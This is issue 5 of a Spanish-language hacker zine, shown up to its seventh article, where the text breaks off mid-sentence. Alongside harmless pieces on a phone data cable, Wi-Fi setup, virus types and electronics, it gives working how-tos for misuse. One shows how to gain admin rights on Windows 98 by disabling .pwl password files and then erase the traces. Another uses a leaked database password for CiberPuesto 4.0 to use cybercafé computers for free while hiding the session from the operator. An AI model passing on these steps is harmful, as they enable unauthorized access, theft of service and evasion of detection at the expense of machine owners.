       
                  """""""""""""""""""""""""""""""""""""""""""
                  """"""""""""""""""""""""""""""""""""""""""
                                 NooB   N 5 

                              Ya estamos aqui¡¡¡ 
                                
                              mail de la zine:
                             noob_zine@yahoo.es
                                    
                  """""""""""""""""""""""""""""""""""""""""""
                  """""""""""""""""""""""""""""""""""""""""""

::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::

                        
                        .-.-.-Staff del numero 4-.-.-.

                            .-. Yani  [Editor] .-.
                              noob_zine@yahoo.es

                        .-. Alicuencana [co-editor] .-.
                           alicuencaniya@hotmail.com    
                            
                            .- Gamb88 [Redactor] -.
                              gcard88@gmail.com

                          .- ArCaNGel [Colaborador] -.
                           arcangel_one8@hotmail.com

                           
                           Web oficial de la zine:
                              www.noobzine.com

                              Mirror oficial:
                     http://es.geocities.com/noob_zine
                           www.zine-store.com.ar      

::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::

>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>INDICE<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<

.......................................................................Autor..
::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::

      1.-  Saludo ------------------------------------------------>    Yani

      2.-  Phreack ----------------------------------------------->   Gamb88

      3.-  Redes: Wireless ---------------------------------------> Alicuencana 

      4.-  Virus ------------------------------------------------->    Yani

      5.-  De user a admin en Win98 ------------------------------>  Arcangel

      6.-  Electronica elemental --------------------------------->   Gamb88

      7.-  Analizando programas ----------------------------------> Alicuencana

      8.-  Algun Exploit ----------------------------------------->   Gamb88  

      9.-  Sobre los emuladores de PC ---------------------------->    Yani 

     10.-  En mi viejo disco duro --------------------------------> Alicuencana

     11.-  Otras tontunas ---------------------------------------->    Yani 

     12.-  Despedida ---------------------------------------------> Alicuencana

     13.-  Claves PGP -------------------------------------------->  Editorial  


///////////////////////////////////////////////////////////////////////////////

1.- Saludo  

Escrito por: Yani

\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\

De nuevo estamos aqui... con un retraso de lo mas amplio (record de la zine
en retraso) pero esque no se puede con todo en esta vida, ya se sabe hay 
etapas en las que se esta mas o menos ocupado. Pero pese a todo estamos de 
nuevo aqui.
Este numero agradecer a los colaboradores de su gran trabajo que ha sido 
gracias al cual la zine ha podido llegar a salir aun a tiempo xd

Sin mas que decir os dejo con la revista, espero que les guste.
Un saludo


///////////////////////////////////////////////////////////////////////////////

2.- Phreack.  

Escrito por: Gamb88

\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\

Para lograr la conectividad de telefonos que no poseen comunicacion infrarroja 
o bluetooth se utiliza el cable de datos, en esta pagina se muestra como hacer 
un datacable MBUS/FBUS con interface serial RS-232.

Nota: El autor no se hace responsable de los danyos que pueda causar al telefono 
una conexion indebida. Pero no hay de que preocupase, siguiendo los pasos al 
pie de la letra lo peor que puede pasar es que funcione!!!!

Conector del telefono:

El procedimiento aquí descrito se realiza para el modelo 
1100, pero igualmente sirve para cualquier otro con pinouts internos.

En el archivo pinouts.png se muestra la funcion y distribucion de pines de 
varios modelos.

Lista de partes:

    Acrilico de 1.5cm x 1cm x 0.2cm 
    Broca de 1/64 ·	4 alfileres 
    Cable plano de 4 hilos 
    Soldadura 
    Cautin 

Manos a la obra!!

1. Cortamos el acrilico a la medida, de tal forma que se ajuste bien a la zona
de contactos del telefono, es importante que el acrilico sea traslucido para 
poder hacer los agujeros en el sitio exacto donde estan los contactos.

2. Los agujeros se realizan en el acrilico sobre los puntos mostrados en la 
foto n1.jpg

3. Despues de realizados los agujeros, se introducen los alfileres cuidando 
que queden al mismo nivel. Se doblan y se cortan da tal forma que no 
sobresalgan de la superficie del acrilico.
Como en la imagen n2.jpeg

4. Se soldan cada uno de los hilos del cable plano a los alfileres, el punto 
de soldadura debe quedar fino para que no cree problemas a la hora de ajustar 
la bateria.
Ver imagenes n3.jpeg n4.pjeg y n5.jpeg

Circuito adaptador RS-232 - FBUS/MBUSSu funcion es adaptar los niveles de 
voltaje de la interfaz RS-232 que oscilan entre los 15 voltios para el nivel 
logico bajo y -15 voltios para el nivel logico alto, a los estandares de los 
protocolos FBUS/MBUS cuyos valores de voltaje son: 0 voltios para el nivel 
bajo y 2.7 
voltios para el nivel alto.Se debe tener en cuenta que la configuracion del 
puerto serial para los protocolos MBUS y FBUS es:Bits por segundo: 9600 para 
MBUS, 115200 para FBUSBits de datos: 8Paridad: NingunaBits de parada: 1Control 
de flujo: Xon / Xoff

Lista de componentes:
    3 Diodos 1N4148 
    1 Regulador de voltaje 78L05
    1 Condensador Electrolitico 470 uF/25V
    1 Condensador Electrolitico 47 uF/16V
    4 Condensadores Electroliticos 10 uF/16V
    1 Diodo Zener 2.7 voltios
    1 Circuito integrado MAX232
    1 Resistencia de 1 kilo ohmio a ¼ de watio
    1 Conector DB-9 Hembra
    Cable de 4 hilos 

Circuito:

Consultar la imagen untitled.bmp

Este circuito funciona con cualquier telefono que soporte el protocolo FBUS o 
MBUS, solo deben diferenciar los pines de contacto en el telefono y hacer el 
conector.

Conexion:
Hay varios programas con los cuales se puede interactuar con el telefono, los 
mas destacados son:

Nokia Data Suite: www.nokia.com
Oxigen Phone Manager 2: www.opm-2.com
MobiMB (Mobile Media Browser): www.logomanager.co.uk
Mobius Px: www.logomanager.co.uk
Logomanager: www.logomanager.co.uk 

///////////////////////////////////////////////////////////////////////////////

3.- Redes: Wireless 

Escrito por: Alicuencana

\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\

En este segundo volumen de redes vamos a comendar aprendiendo por el final, 
por una de las ultimas tecnologias sobre redes que ahora mismo esta tan de moda
y que tam poca gente realmente sabe proteger y usar de verdad.
Vamos a aprender sobre las redes Wireless como funcionan, com usarlas y como 
sacarlas el maximo partido.

Empecemos:


1.- Prologo

Mucho se habla ultimamente de las redes wireless y no es para menos, aunque aqui
en espanya estan creciendo de manera exponencial (ya era hora) hay paises como
EEUU donde hace ya algunos anyos que estan alla donde te muevas.
Las redes wireless gracias a su facilidad y sus caracteristicas van bajo el 
estandarte de "Internet gratis" proliferando por toda la peninsula puntos de acceso
gratuitos con una u otra condicion de uso, eso ya queda como decision del que 
ofrece el servicio.
Crear una red wireless no es en absoluto dificil y cada dia vemos que son mas 
baratas asi que en este neumero con windows y en posteriores con linux vamos a 
ver como podemos crear nuestra red y a ver si se animan a colaborar con el movimiento
por un internet gratis que tantas multinacionales (y otras nacionales) tratan de 
evitar a toda costa.

2.- Eligiendo adaptador

Empezemos desde el punto de vista del usuario, vamos a conectarnos a una red wireless
de acceso libre o no libre pero mal configurada (que las tienes alla donde vayas).
Lo primero que necesitas es tu adaptador, hay muchisimas marcas, modelos y estandares
pero cuando vayas a comprar uno lo primero que debes pensar es cual es el uso que 
le quieres dar:

- Dependiendo de si solo usas windows o  tambien otros SO, hay marcas que no son
compatibles asi que puedo recomendar que busques Ovislink la cual no suele dar 
problemas de compativilidad con uno u otro SO.

-dependiendo del alcanze que necesites:  Hay adapatadores que funcionan mediante 
USB los enchufas a tu puerto USB y listo ya casi funciona solo, pero si vas a 
necesitar aumentar tu alcanze porque la red de tu amigo el que te deja conectarte
esta a varios metros de tu casa necesitaras insertar uan antena que estos disposi
tivos no es posible enganchar.

- ¿interna o externa? como en todo hay aadaptadores internos y otros internos (como 
ya he dicho) si vas querer meter despues una antena te recomiendo uno externo y 
que tenga su adaptador para la misma (miralo por detras su esta el adaptaro N hembra
que suele ser el que se pone cuando haces tu antenita casera xd).

- Dependiendo de la velocidad que vayas  a usar: hay varios protocolos 802.11b
802.11a, 802.11g... y muchos mas, los mas comunes son el 802.11b y 802.11g 
que van a 11Mbps y 54Mbps respectivamente (cuanto mas alta es la letra mas sube
la velocidad xd)

- Si tienes un portatil y no leva modem  wireless incluido (hoy en dia suelen venir
incluidos y son internos lo cual algunos de ellos dejan bastante que desear en 
su funcionamiento posterior) tienes las Pc Card o PCMCIA con las cuales puedes 
engancharte a wireless con la misma facilidad que el resto de pc's.

3.- Configurando nuestra conexion

Vamos a configurar nuestra conexion, dependiendo de lo que quieras hacer con tu
recien adquirido adaptador.

3.1.- Conexion a un punto de acceso.

Una vez que hayas enchufado o instalado tu adaptador tienes que configurar las 
opciones de los distintos protocolos que usamos sin darnos cuenta cuando nos 
conectamos a la red.

tcp/ip -> procolo de red, propiamente dicho, es tu direccion, unica y si puede
ser transferible que que si no es fija cambia cada vez que te conectas a la red.

Mascara de red -> Esta indica el tamanyo de la red y el rango de la ip que estas
usando, muy importante estar en el mismo rango de la red, tango para puntos de
acceso como para LAN's, asi que fijate primero en esto cuando tengas problemas
con tu conexion.

Puerta de enlace -> es la direccion del punto de acceso, la verdad es que la 
mayoria de ellos segun la marca usan la misma lo cual nos facilita mucho la labor
cuando queramos asaltar alguno mediante telnet.

Direccion de DNS -> El protocolo DNS es aque que guarda y asigna IP's a dominiso 
y particulares.


Para configurar esto dirijete a las propiedades de tu nueva conexion inalambrica
que te habra aparecido si has instalado correctamente, para quien no sepa donde 
esta dirijete a:
Inicio -> Conectar a -> Mostrar todas las conexiones

Veras que te ha aparecido un nuevo apartado donde pone: "LAN o internet de alta
velocidad" y debajo tendras tu conexion inalambrica.
Haz click con el boton derecho y dirijete a propiedades.

Sencillamente tienes que marcar la casilla anterior a donde pone Protocolo TCP/IP
y despues con el senyalado haz click en propiedades. En la pestanya General 
marca que te Obtenga una direccion IP automaticamente y acepta para cerrar las 
ventanas. 

Ya esta configurado ahora veamos que redes alcanza tu adapatador solo tienes que 
hacer click derecho (de nuevo) sobre tu nuevo acceso de conexion inalambrica 
y dirijirte ahora a la pestanya de "Ver redes inalambricas disponibles".
Te apareceran 1, 0 o varias. Las que veas que tienen bajo el nombre un candado 
son aquellas que estas aseguradas con alguna contrasenya, estas redes usan el 
cifrado WEP (ya os explicaremos como averiguar esa contrasenya) las que no 
tienen ese candado son ahora mismo nuestro objetivo solo tienes que senyalar la
que mas te guste (aunque te aconsejo que senyales la que mas conectividad tengas
que son esas rayitas verdes que aparecen a la derecha de cada conexion, cuantas
mas rayas verdes tengas mas conexion tienes xd) y esperar, con esto ya deberias 
tener internet. Aunque esto no es del todo cierto pero el tema de manual y 
automatico vamos a tratarlo mas adelante, un poco de paciencia.

3.2.- Conexion a otro ordenador.

Por supuesto con wireless tambien puedes conectar de un modo inalambrico a otro
pc, puede aguantar hasta 3 pc conectados en red sin tener que comprar un punto
de acceso, pero si son mas (y a veces solo con 3) ya es necesario el mismo.

Para que tu adaptador se ponga a buscar a pc y no conexiones inalambricas debes
volver a las propiedades de TCP/IP que hemos indicado antes pero esta vez nos 
dirijiremos a la pestanya de "redes Inalambricas" y posteriormente a Opciones
avanzadas. Te saldra una ventanita con 3 opciones, por todo lo que hemos comen
tado hasta ahora tendrias que conocer ya el significado y la utilidad de las 
dos primeras (viene en la primera marcada por defecto) pero es la tercera
la que tienes que marcar.
El modo de pc a pc es denominado Ad hoc, y hacer una red en este modo es tan 
sencillo como marcar dos ordenadores en este modo y buscarlos, una vez ahi ya
solo tienes que compartir la carpeta que quieras que tenga acceso y mediante 
Mis sitios de red ambos vereis aquello que este compartido y podreis interactuar
de este modo.


Por este numero hasta aqui hemos llegado para quienes no conocian esto vayan 
poniendolo en practica pues pronto comenzaremos con routers, solucion de
problemas y mas...
Espero que les haya gustado.


///////////////////////////////////////////////////////////////////////////////

4.- Iniciacion al mundo de los virus 

Escrito por: Yani

\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\

Puede que con este articulillo me este adelantando pues tenemos en preparacion 
varios articulos sobre programacion que deverian ser los antecesores de este 
pero aqui vamos a dar los tipos de virus que hay y como los antivirus los 
detectan, asi que por el momento para este articulo no es necesario tener unas
nociones sobre programacion, pero si vendra bien para quien no tenga 
conocimientos sobre los virus saber que tipos hay y que hace cada tipo para que 
en cuanto hayamos visto mas programacion podamos comenzar a analizarles :)

1.- Definicion de virus.

La definicion de virus imagino que todos la conoceremos ya, son programas que
mediante diversas tecnicas se autorreproducen y causan danyos de diverso tipo.

2.- Que hace un virus.

Aunque cada virus es un mundo hay unos patrones de funcionamiento que muchos 
de ellos cumplen.

 a) El virus se carga en la memoria llegando al pc por diversos modos, hoy en 
dia el metodo mas tipico es mediante Internet.

  b) El virus deve ser ejecutado la primera vez por el usuario entonces se 
queda esperando donde empezar a infectar.

  c) Cuando el usuario ejecuta otro programa el virus le infecta y comienza ha 
hacer sus copias por el sistema por si es descubierto y quieren eliminarlo.

  d) El virus sigue infectando todos los programas que hay en el ordenador 
cuando el pc se cierra se borra lo que estaba cargado en la RAM pero para 
entonces ya esta en el resto de programas ejecutados y en os programas de 
inicio (para ejecutarse en tanto que el pc se encienda).

3.- Tipos de virus.

Troyanos

Estos bichotos son ya conocidos por la zine. Son de los primeros programas 
que se aprenden a usar cuando se busca atacar a alguien.
Constan de dos programas uno para infectar y el otro para controlar (cliente
servidor).
Se manda el programa cliente y cuando la victima lo ejecuta le abre un puerto
que es mediante el cual entra el programa servidor del atacante y comienza
el ataque. Puede hacer muchas cosas con un buen troyano desde destruir informa
cion hasta sencillamente transmitirla (si lo que busca es sacar informacion).

Virus polimorfos

Son virus que general claves de encriptacion y desencriptacion, cada vez que 
infectan un nuevo programa o archivo generan una nueva clave por lo que son
muy complicados de detectar ya que gracias a la clave el cuerpo del codigo 
varia y por ello no es facil de encontrar.

Gusanos

Estos virus hacen millones de copias de si mismos por lo que llenen la memoria
consiguiendo colapsar el sistema infectado.
Es una de las pocas clases de virus que pueden afectar a sistemas Unix como ya 
sucedio hace varios anyos.

Virus sigilosos

Estos virus cuando infectan o cambian algo de un programa falsean el rastro que
estos cambios hayan podido producir por ello nadie detecta que algo ha sido 
cambiado en esos programas y prosiguen su infeccion.

Retro-Virus

Estos virus son de los mas practicos hoy en dia.
Se ocultan de los antivirus atacando a estos directamente buscando sus agujeros 
o de otros modos. De este modo consiguen que los usuarios desconozcan que el 
programa malicioso esta atacando su ordenador.

Virus multipartitos

Estos virus lo que hacen es atacar directamente a los sectores de arranque, de
este modo ya se aseguran que al ser iniciado el ordenador el virus se inicie 
tambien y de ese modo comienza su ataque a los demas programas.

Virus de Macro

Estos virus son independientes, no son un programa ejecutable como los explicados
anteriormente. Estos virus pueden estar dentro de un archivo de texto de manera
que mientras estas leyendo o enviando informacion a alguien lo que realmente 
estas haciendo es infectar tu pc o el de otra persona.

Bombas logicas

Esto no esta dentro del grupo de virus en si pero hacen tanto o mas daño que
un virus.
Son programas que cuando se cumple una condicion que el programador ha indicado
(un dia, una hora, la ejecucion de cierto programa...) el bichito entra en 
accion causando diversos daños o destrozos.

Bueno por este numero hemos explicado que es un virus en si y las clases de los
mismos que hay, para el siguiente numero seguiremos explicando tecnicas
y ejemplos de los virus existentes.

///////////////////////////////////////////////////////////////////////////////

5.- De usuario a administrador en Win 98 

Escrito por: ArCaNGeL

\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\

En este artículo os voy a explicar como se pueden crear cuentas de administrador
en un equipo con windows 98 sin ser administrador, simplemente siendo un usuario
sin permisos, en unos sencillos pasos (información obtenida de foros 
portalhacker).
Lo primero que debes hacer es encender el equipo en modo seguro, dándole a 
f5 al encender.
Cuando estés en windows localiza (usa el buscador de windows) los archivos 
con extensión .pwl  y los renombras a .pww. Renombrándolos conseguirás que 
queden inutilizados.
Ahora solo tienes que reiniciar el sistema y crearte una cuenta de admin. Ya 
que no te pedirá ningún password ni  ningún usuario porqué dejaste los archivos 
que contenían esa información inutilizados.
Ya tienes una cuenta de admin. En el equipo, si no quieres dejar huellas y quieres 
que la cuenta anterior vuelva a ser la de administrador del equipo tienes que 
reiniciar en modo seguro, una vez en windows buscar los archivos .pwl ,que esta 
vez serán los de la cuenta de administrador que tu creaste, y eliminarlos.
Ahora solo queda volver a renombrar los archivos .pww a .pwl  para que la cuenta 
del verdadero administrador vuelva a funcionar. Reinicia el ordenador y tienes 
el pc en la misma situación que antes de que lo tocaras.

By:ArCaNGeL


/////////////////////////////////////////////////////////////////////////////

6.- Electronica elemental 

Escrito por: Gamb88

\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\


Hola amigos! en esta edicion de la NooB Zine he escrito para ustedes
un artitucolo sobre

ELECTRONICA ELEMENTAL, que nos ayudara a incrementar nuestros
conocimientos en la parte de

hardware y de paso podremos construir pequen~os circuitos con unas
cuantas simples piezas, y un

poco de dinero y tiempo!! Por supuesto :) armaremos maravillas 
impresionantes.

Vale aclarar de paso, a las personas que andan siguiendo lectura a la
seccion Phreacking de esta

zine, que esta guia, Elemental pero necesaria, les sera de gran
utilidad, en esa seccion se iran

poniendo esquemas de circuitos electronicos para desarrollar y 
utilizar.

Bueno empezemos ya!

ELECTRONICA. DEFINICIONES

La Electrónica es una disciplina que abarca un amplio abanico de
actividades relacionadas con la

generación y transmisión de informaciones por medio de señales 
eléctricas.
A diferencia con la Electricidad -rama de la Física de la que arranca
la Electrónica-, esta

moderna disciplina vuelca su interés en la información transportada
por las señales eléctricas;

básicamente tensión y corriente eléctrica.

La puesta en práctica de las técnicas electrónicas toma cuerpo en los
denominados sistemas

electrónicos, los cuales manipulan las señales eléctricas para
generar, canalizar y presentar

informaciones.

Los sistemas electrónicos están integrados por un conjunto de
circuitos especializados en ciertas

funciones.

A su vez, los circuitos están constituidos por la asociación de
elementos físicos cuyas

propiedades determinarán el tratamiento que recibirán las señales
eléctricas manipuladas. Estos

elementos reciben el nombre de componentes.

CIRCUITOS ELECTRONICOS

Como se ha indicado, un circuito electrónico es una asociación de
componentes cuya actuación

coordinada permite realizar un determinado tratamiento de las señales
eléctricas.

Todo circuito electrónico se representa por medio de su
correspondiente esquema en el que
aparecen los dos elementos materiales que lo integran:

Los componentes: resistencias, condensadores, diodos, transistores...
Los conductores que enlazan a los componentes entre sí.

En definitiva, el esquema de un circuito electrónico corresponderá a
la ilustración gráfica de

los componentes o dispositivos físicos que intervienen en el mismo,
representados por su

correspondiente símbolo, y de los enlaces o conexiones que los unen

Para que la interpretación del esquema de un circuito electrónico
resulte asequible, es necesario

conocer la representación específica o símbolo asociado a cada uno de
los diversos tipos de

componentes y a los conductores de enlace que conforman el circuito.

COMPONENTES Y MODELOS

A la hora de utilizar los componentes para construir circuitos
electrónicos resulta

imprescindible conocer su comportamiento y propiedades eléctricas.
Dicho conocimiento se concreta en un modelo teórico que sintetiza las
características y

funcionalidad de cada componente. En consecuencia, la entrada en el
ámbito de la Electrónica

supone familiarizarse con las leyes eléctricas fundamentales y con el
modelo representativo del

comportamiento eléctrico de los diversos componentes.

Los modelos teóricos consideran al componente que representan como un
dispositivo dotado de una

entrada y una salida, reflejando el tratamiento que dicho componente
otorga a las señales

eléctricas que se le aplican.

COMPONENTES PASIVOS Y ACTIVOS

Los componentes que intervienen en los circuitos electrónicos se
clasifican en dos grandes

grupos:

COMPONENTES ACTIVOS
Este apartado engloba a los auténticos componentes electrónicos o
dispositivos físicos capaces de

aportar una ganancia o permitir el control de las señales eléctricas.

En los primeros tiempos de la Electrónica, los componentes activos
eran válvulas de vacío o de

atmósfera gaseosa. Actualmente, los dispositivos electrónicos activos
son de estado sólido y

están construidos a partir de sustancias semiconductoras.

Los modernos componentes activos a semiconductores (diodos,
transistores, tiristores, triacs...)

están basados en las propiedades físicas de transporte de cargas
eléctricas que tienen lugar en

la estructura íntima de los cuerpos.

COMPONENTES PASIVOS
No aportan una ganancia o un control de las señales eléctricas que los
atraviesan, sino que su

actuación se reduce a la puesta en práctica de una propiedad
eléctrica, como puede ser la de

almacenar carga (condensadores) o presentar una determinada oposición
al paso de la corriente

(resistores).

Los COMPONENTES mas utilizados en electronica.

RESISTENCIAS: son unos componenteS que se oponen al paso normal de la
corriente eléctrica.
En una resistencia tenemos 4 bandas de colores. Lo primero es
identificar cual es la primera

banda y cual la última. esto es facil.

Normalmente la primera banda esta mas desplazada hacia el final del
cuerpo de la resistencia que

la última. Ademas la ultima banda, casi siempre será o bien dorada (lo
mas normal) o bien

plateada (mucho mas raro). Asi tenemos 4 bandas:

Colores         1ª Cifra        2ª Cifra        Multiplicador   
Tolerancia
Negro           0               0               x 1
Marrón          1               1               x 10            1%
Rojo            2               2               x 100           2%
Naranja         3               3               x 1000
Amarillo        4                               x 10000
Verde           5               5               X 100000        0.5%
Azul            6               6               x 1000000
Violeta         7               7
Gris            8               8               x 0.1
Blanco          9               9               x 0.01
Oro                                             0.1             5%
Plata                                           0.01            10%
Sin color                                                       20%

Si los colores son: (   Marrón   -   Negro   -   Rojo   -   Oro   ) su
valor en ohmios es
                         1              0        x 100      5 %   =
1000   = 1K

5 bandas de colores
También hay resistencias con 5 bandas de colores, la única diferencia 
respecto a
la tabla anterior, es qué la tercera banda es la 3ª Cifra, el resto 
sigue igual.

CONDENSADORES:

Un condensador es un dispositivo eléctrico que permite acumular cargas
eléctricas. Se mide en

Microfaradios. Se denomina Capacidad C a la relación entre la carga Q
almacenada por el

condensador y la tensión U a la que está conectado. CAPACIDAD DE UN
CONDENSADOR: (C = Q / U)
C en Faradios, Q en Culombios, U en voltios.

PLACAS:

Son superficies en donde van montados los componentes electronicos, 
existen dos tipos de placas, las cuales conozco, las placas virgenes, 
tienen superficie lisa, sin ningun tipo de orificio, en el cual se debe 
usar la perforadora especial para aguajerearla, y tambien se debe usar el 
acido para hacer los conductos. El otro tipo de placa es la placa 
perforada, que como su nombre lo dice, viene completamente perforada, no hay 
necesidad de que se use la perforadora, y se usa hilos de conexion para 
hacer los conductos, o conexiones.

SOLDADORES:

Son elementos que calientan el estaño en este caso (elemento con que se 
sueldan los componentes electronicos), Existen variados tipos, 
dependiendo de su capacidad, los mas conocidos son los de 15w, 30w, y 100w.

ESTAÑO:

Como dije anteriormente el estaño es un elemento con el que se unen los 
componentes electronicos, se usa conjuntamente con el soldador, al 
recibir calor, el estaño se derrite, obteniendo una forma liquida, y al 
transcurrir de unos segundos vuelve a su estado normal, sólido.

TRANSISTORES:

El transistor es un dispositivo de 3 patillas con los siguientes 
nombres: base (B), colector (C) y emisor (E), coincidiendo siempre, el 
emisor, con la patilla que tiene la flecha en el gráfico de transistor.

Existen dos tipos transistores: el NPN y el PNP, y la dirección del 
flujo de la corriente en cada caso, lo indica la flecha que se ve en el 
simbolo de cada tipo de transistor.

CIRCUITOS INTEGRADOS:

Un circuito integrado es un pastilla o chip en la que se encuentran 
todos o casi todos los componentes electrónicos necesarios para realizar 
alguna función. Estos componentes son transistores en su mayoría, aunque 
también contienen resistencias, diodos, condensadores, etc.

Atendiendo al nivel de integración - número de componentes - los 
circuitos integrados se clasifican en:

SSI (Small Scale Integration) pequeño nivel: inferior a 12 
MSI (Medium Scale Integration) medio: 12 a 99 
LSI (Large Scale Integration) grande : 100 a 9999 
VLSI (Very Large Scale Integration) muy grande : 10 000 a 99 999 
ULSI (Ultra Large Scale Integration) ultra grande : igual o superior a 
100 000 
En cuanto a las funciones integradas, los circuitos se clasifican en 
dos grandes grupos:

Circuitos integrados analógicos: Pueden constar desde simples 
transistores encapsulados juntos, sin unión entre ellos, hasta dispositivos 
completos como amplificadores, osciladores o incluso receptores de radio 
completos. 

Circuitos integrados digitales: Pueden ser desde simples son puertas 
lógicas (Y, O, NO) hasta los más complicados como los microprocesadores.

POTENCIóMETRO:

Un potenciómetro es un componente electrónico que permite regular el 
paso de
corriente a través de el al girar un interruptor que tiene.

HILO DE CONEXION:

Sirve para conectar o conducir un componente electronico a otro. Se 
utiliza mucho en el caso de las placas perforadas.

CIRCUITO IMPRESO:

Un circuito impreso es un componente electrónico diseñado para 
interconectar otros componentes.  Usualmente consiste de un patron de material 
conductivo sobre un substrato aislante.


Ok.. Esos fueron los terminos mas utilizados en electronica, aunque no 
son todos, aun hay muchos mas.

Algunos consejos:

EL SOLDADOR PERFECTO

El soldador electrico indicado debera ser de 15w a 30w, es mejor 
utilizar esos de menor capacidad, ya que los otros, por ejemplo el de 100w 
podria quemar las pequeñas piezas e inclusive la placa si es que se 
sobrecalienta demás, tambien tienen la desventaja de que son muy grandes y 
resulta muy incomoda su correcta utilizacion, sin embargo los de menor 
capacidad resultan mas eficientes y son comodos.

EL CIRCUITO IMPRESO

Es de gran utilidad el circuito impreso, ya que nos "facilita la vida", 
jeje, por que en el ya todas las soldaduras o "caminos" ya estan 
hechos. Doy un ejemplo: Dos resistencias llamadas R1 y R2 respectivamente.

o  o]---------[o  o
   R1         R2

Supongamos que R1 y R2 ya estan soldados a la placa, R1 debe estar 
conectado a R2, para eso SIN EL CIRCUITO IMPRESO hay que soltar un pequeño 
cable (hilo de conexion) a R1 y luego sin que este se des-suelde, 
soldarlo a la patita de R2

Ahora vamos CON EL CIRCUITO IMPRESO:

El mismo ejemplo:

o  o==========o  o
   R1         R2

Con el circuito impreso el camino de la patira de R1 a la de R2 ya está 
hecha, ya no es necesaro utilizar el hilo de conexion para unir ambas 
piezas, solo basta con que R1 y R2 estén soldados en la superficie de la 
placa, ya que el cobre de la placa sirve como conductor.



EL ACIDO & EL CIRCUITO IMPRESO

El acido esta estrechamente relacionado con el Circuito Impreso, para 
poder utilizar correctamente el C.I. e imprimirlo en la placa virgen 
(sin perforaciones) debemos:

1- Tener el diseño del circuito impreso en la PC.

2- Imprimirlo con una impresora láser con la calidad optima (la que 
utiliza mas tinta, ya que a nosotros nos interesa el toner que larga la 
impresora laser)

3- Cortar la placa virgen a la medida del C.I. ya impreso, conectar la 
plancha, (si, esa que utilizas para planchar tu ropa, jeje) colocar el 
C.I. sobre la placa virgen (obviamente la impresion debera mirar hacia 
abajo. Un consejo antes de hacer el paso 3, es con una virulana, o 
algun cepillo limpiar bien la superficie de la placa, para que quede sin 
suciedad alguna.

4- Planchar el C.I. hasta que el toner quede bien marcado sobre la 
superficie de la placa virgen.

5- Dejar enfriar.

6- Preparar el ácido y tirar la placa que habiamos estado preparando 
anteriormente, en la solucion que hemos hecho (el acido); dejar unos 
minuto hasta que el C.I. quede bien impreso. Sacar y secar. Sugerencia: no 
dejar demasiado tiempo en el acido por que éste destruye mucho el cobre 
que tiene la placa.

Ok, eso es todo por ahora, proximamente pondre un apartado en la web de 
NooB Zine, con los simbolos electronicos para que los conozcan bien, ya 
que por este medio no lo puedo hacer.

Cualquier comentario y/o sugerencia, dirigir a:
gcard88@gmail.com

Bytes!!!



///////////////////////////////////////////////////////////////////////////////

7.- Algun exploit

Escrito por: Gamb88

\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\

Exploit CiberControl / CiberPuesto 4.0

 

Ok, escribo este articulo para la Noob_Zine, soy Gamb88, bueno, ahí va, pues 
bien, ya vieron que la mayoria de los ordenadores que estan en los cybers tiene 
una shell distinta a las PC normales, pues si, los duenos de los cybers 
utilizan eso para poder controlar a las personas, es decir el tiempo que 
utiliza cierto ordenador y poder cobrar asi el monto indicado por ellos.

Les mostrare el modo de poder usar gratis, free!! Sin pagar ni un céntimo, 
bueno, no tanto asi.

Nota: Este exploit solo lo probe en un CiberPuesto versión 4.0, esta 
comprobado y funciona.

 

Les explico:
 

1- Van a un cyber, y piden el prepago minimo que se pueda hacer.

 

2- Buscan en el directorio donde va instalado windows, el archivo cp40.mdb 
generalmente c:\windows, o si no es eso buscan otro, pues ni modo.. xD, 

Nota: Si no podemos acceder al directorio raiz debido a restricciones del 
sistema, nos bajamos www.mozilla.org una vez instalado podemos acceder al 
disco duro colocando en la barra de direcciones de mozilla " c: " o 
" \\127.0.0.1\c$ "

 

3- Ok, vieron que la extension es MDB, deriva de Microsoft Data Base, es 
una base de datos!! WoW.. que datos interesantes encontraremos ahí?, mejor 
sera que lo descubramos por nuestra cuenta, ok, ok.. ansiosos no?, lo 
abrimos, si no tenemos el programa con que abrirlo entonces, descargamos de 
internet cualquiero Data Base Editor, o Editor de Base de Datos en espanol, 
lo intalamos, abrimos el archivo cp40.mdb, que habiamos mencionado al 
comienzo, pero que mal!!! Nos pide un pass, eso no es problema, el pass es 
“8730AX0418W”, obviamente sin las comillas, el pass de los administradores 
(duenyos del cyber) esta en Configuración (en la base de datos).

 

Obtenido el pass entonces;

 

1- Bloqueamos el ordenador, presionamos la tecla F2, nos pide un pass, 
(el del administrador), entonces le ponemos el que obtuvimos en la base 
de datos.

 

2- Arriba a la izquierda dice Menu Administrador, entramos ahí, después 
en Seguridad del PC, Seleccionamos Nivel Nulo, Aplicar (no olvides de 
aplicar, asi para efectuar los cambios correspondientes).

 

3- Ya estaremos usando gratis, pero en el ordenador central estara marcando 
que usamos la cuenta del administrador, pero eso se soluciona ejecutando 
el HackCiber 4.0 o HackCiber 5.0 (dependiendo de la versión).

El HackCiber hace que en el ordenador central no diga que entramos con la 
cuenta del administrador, hace ver como si el ordenador no estuviese en 
uso. Es muy util ya que no llama mucho la atención, corremos peligro si, el 
tipo que esta atendiendo, habilita el ordenador que estemos utilizando y 
paff!!! Venga y encuentre que la PC se esta utilizando.

 

Nota: No pondre enlaces al HackCiber 4.0/5.0, por que siempre después de 
un tiempo determinado los enlaces se rompen y ya no se puede descargar, 
